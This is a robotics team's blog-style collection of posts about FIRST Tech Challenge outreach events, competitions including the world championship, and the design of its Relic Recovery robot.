Giving back to those in our community is a key aspect of our team. Annually, we set up a booth at Caln Community day. We demonstrate our FTC robots, allowed kids to work at the Tinker Table or create their own slime. Each activity was well received by 2000 people who attended the event that day.
On September 8, 2018, Out of the Box Robotics attended the First Tech Challenge Season Kickoff at Penn State Great Valley in Malvern, PA. Twenty teams were in attendance to learn the objectives of the Rover Ruckus game.
We also partnered with Actobotics to give out coupons, free products and team sponsorships to the following 12 teams:
We also Tweeted a picture to #actoboticsfreebies to try and win $100 in free pizza from Actobotics for our team!
The American Helicopter Museum holds an annual Father’s Day Fest, where they show off their helicopters, as well as an antique car show. This year they wanted to do a Robotics outreach and they asked Out of the Box to do a demonstration of the robot. We brought a half field and our robot, which we allowed the kids to drive around. In addition, we brought a table full of activities for kids to explore engineering.
We reached a large number of people and even signed up 10 kids for FLL teams. We also got interest from 3 kids who wanted to join our FTC team. We had an opportunity to reach out a number of people in our community and talk about FIRST. We got several kids interested in the FIRST programs, and had a lot of fun ourselves.
We attended the world championship on April 24-27. Here we competed with teams from all around the world.
Our robot preformed fairly well, however we where not picked for alliances at the very end. Our close friend LanBros 9971 was able to make it all the way to the final matches where he became a finalist.
Congratulations to the winners 8393, 8644, and 4029.
Today we demonstrated our robots to Girl Scouts! We met the brownie troop leader at Caln community day, and she asked us to do a demo and a stem workshop for her brownies. We happily obligated to this, as we love doing demos in our community.
We showed the brownies three videos about the First program, FLL Junior, and the FTC. Then, we did a demo of last year’s game, Velocity Vortex, and we drove around and shot the particles in the vortex. After the demo we split the Brownies into two groups. The first group made slingshot rockets while the second group had a chance to drive/operate the robot. After the first group finished making the rockets, we had them switch so all of the Brownies would get a chance. Finally, we had a competition to see which rocket went the farthest. After that, we were able to show them the FRC team 1640’s robot since they were had it out for testing.
Overall, this was a very positive event. The event went according to plan., and the DIY rockets worked even better than expected! The girls were good drivers and they all loved our robots They liked watching the FRC robot too. The girls and their parents were interested in joining our FLL Jr. Team waitlist.
We have made a lot of progress since kickoff, and we would love to tell you about our robot so far!
This year for Relic Recovery we wanted to focus on scoring the glyphs and create ciphers.
After designing and prototyping a few different intake / claws designs we settled on a wheeled intake; however ours is more unique than most. We have a duel, bidirectional, spring loaded, omni wheel intake. The omni wheels had to be tiny, and we mean TINY. We had to order these 15mm omni wheels from a company in Australia to obtain wheels of this size. The intake is able to grab a block, and then lift it vertically; all in the same space. This allows us to quickly intake and score sets of two blocks, and we even have a trick to reverse the order they dispense!
We chose to go with a 6 wheel drive base this year, because we felt it would be the most reliable in autonomous. We also are predicting that in later competition there will be defense being played in the glyph pit, and we want to be able to do well against that. Many have claimed that six wheel drive is harder to line up, however we have not found that to be the case.
In autonomous we use the same gyroscope PID based drive that won us Control at worlds last year. We are able to knock off the jewel while being completely stationary, thus making sure we do not loose our positioning on the stone. We are able to intake a second glyph, and score both into the correct column. We do this on the far side of the field, and to our knowledge very few teams are able to do this.
Currently we are working on a relic mechanism, and an autonomous for the stone closer to the audience. We are also improving the build quality of our intake to hopefully make it more efficient.
